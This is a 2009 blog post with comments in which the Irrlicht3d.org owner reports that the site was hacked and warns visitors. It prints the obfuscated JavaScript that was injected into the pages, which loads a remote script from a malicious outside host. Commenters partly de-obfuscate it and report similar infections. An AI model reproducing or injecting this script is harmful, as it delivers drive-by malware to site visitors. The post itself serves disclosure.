Website Hacked

Posted on:December 29 2009

Two websites I'm running, Ambiera.com and this site, Irrlicht3d.org have been hacked yesterday. We are not sure yet how this happened, but if you visited this blog or Ambiera.com yesterday between 10 and 12 o'clock (UTC +1), it might be a good idea to run some anti virus software on your PC, I cannot say what the attacker extactly wanted to do: Somebody attached a javascript to the bottom of a few html sites. The code looked like this:

var Gldapnhsg069 = document.createElement('s$@c###(r^i&)p@&@t^)'.replace(/#|\^|\$|&|@|\!|\(|\)/ig, ''));var Hd1voqaixds8 = 'E1usw40fczkxa7';Gldapnhsg069.setAttribute('type', 't(^$e)x)t)(^/)@j(@a^v^&a#!#s$!c@&r@i^&&p)t!^'.replace(/\)|\(|&|#|\^|\!|\$|@/ig, ''));Gldapnhsg069.setAttribute('src', 'h!&(t(t!(p#:))!^/#/#!$f^r&@!e(&e&#^o(@n$e!s)$-@&(c&^(o!$m^^@$.#b^@a($)d&#j&$^o&@$j$@o&)#.!c)$$o#!#&m((.@&$i@b^@i(@)(b)!()o^$@-$@(!!c$!o^!(@m&)^@^.($^t@h)e$&#@m&)o##b$#&)i@^&s!(i#t$#e!.&&(r)#u^^@@:&@8(#0!8^(&#!0&!@)/$$)#g(@)#o)(o(@)!g$l!#&)e)@)).)!!^c$&)o)m!/#@g!o$&o^g$(l)$$^e&#.!^c#&o)$(#m@()/&^j#!$r)!)j@.#^!c#!o@!@m&.!)#c$(#!n))/&m&@@e!)@d&#i)(!(a@$s!$e(t&@&#.)^@&i&#$(t@/((b$)a^&@&n)k(!^o()(f$&$a$$$m$e^(&r^i!((@c#((@a)).@@&c&!(o!#m&)/!^^'.replace(/\!|\$|&|@|\(|\)|#|\^/ig, ''));Gldapnhsg069.setAttribute('defer', 'd(!@e^()f$$(@e)#r@)'.replace(/@|\^|\)|\(|&|\$|\!|#/ig, ''));Gldapnhsg069.setAttribute('id', 'G@$@&0@!$&m&7$@@!p(@$!!x($c$d^$8$&c(^$$4&!w((^)4$$&@'.replace(/@|\$|\!|&|\)|\^|#|\(/ig, ''));document.body.appendChild(Gldapnhsg069);}} catch(Cla4d3870kj7) {}

(some random line breaks added by me for security)
I have not looked what this actually does, but if you are interested, feel free to have a look at this. Thanks to Jetro for quickly letting me know about this problem!





Comments:


Looks like this is not a complete piece of code.
Commented the code out to avoid problems and renamed "Gldapnhsg069" to "scriptElement" for better reading:


/*

var scriptElement = document.createElement( 'script' );

var Hd1voqaixds8 = 'E1usw40fczkxa7';

scriptElement.setAttribute( 'type', 'txt/javascript' );
scriptElement.setAttribute( 'src', 'HERE COMES AN ADRESS');
scriptElement.setAttribute( 'defer', 'defer' );
scriptElement.setAttribute( 'id', 'G0m7px8c4w4' );

document.body.appendChild( scriptElement );

}} catch(Cla4d3870kj7) {}

*/
KIENI
Quote
2009-12-29 08:33:00


This was the whole script, except where it was trying to invoke itself of course (set it to window.onload). Also, I omitted a comment in the beginning with the only content 'GNU GPL', but that was all.
niko
Quote
2009-12-29 09:16:00


Yesterday, irrFuscator was briefly mentioned in this talk on the Chaos Communication Congress: http://events.ccc.de/congress/2009/Fahrplan/events/3494.en.html

Maybe some script kiddy in the audience had a stupid idea?
ak
Quote
2009-12-29 12:10:00


hm, interesting (thanks for the link, btw) could be an idea.. :)
niko
Quote
2009-12-29 18:55:00


Are you using weak or commonly used passwords (the same as on other website)?
ale
Quote
2009-12-30 05:12:00


no, it's not a weak password, but there is only one: it's only one website, with different domains.
niko
Quote
2009-12-30 11:19:00


That is fucking sick.
The same day, around the same time, my wordpress blog got hacked - code looked the same (js & index.phps overwritten) and a private phpBB3 forum of mine, both running on different servers!
And as that's not enough, the forum hack installed trojans on my two PCs... (syszid)
christian
Quote
2009-12-31 09:55:00


Add comment:


Posted by:


Enter the missing letter in: "Internat?onal"


Text:

 

  

Possible Codes


Feature Code
Link [url] www.example.com [/url]
Bold [b]bold text[/b]
Quote [quote]quoted text[/quote]
Code [code]source code[/code]

Emoticons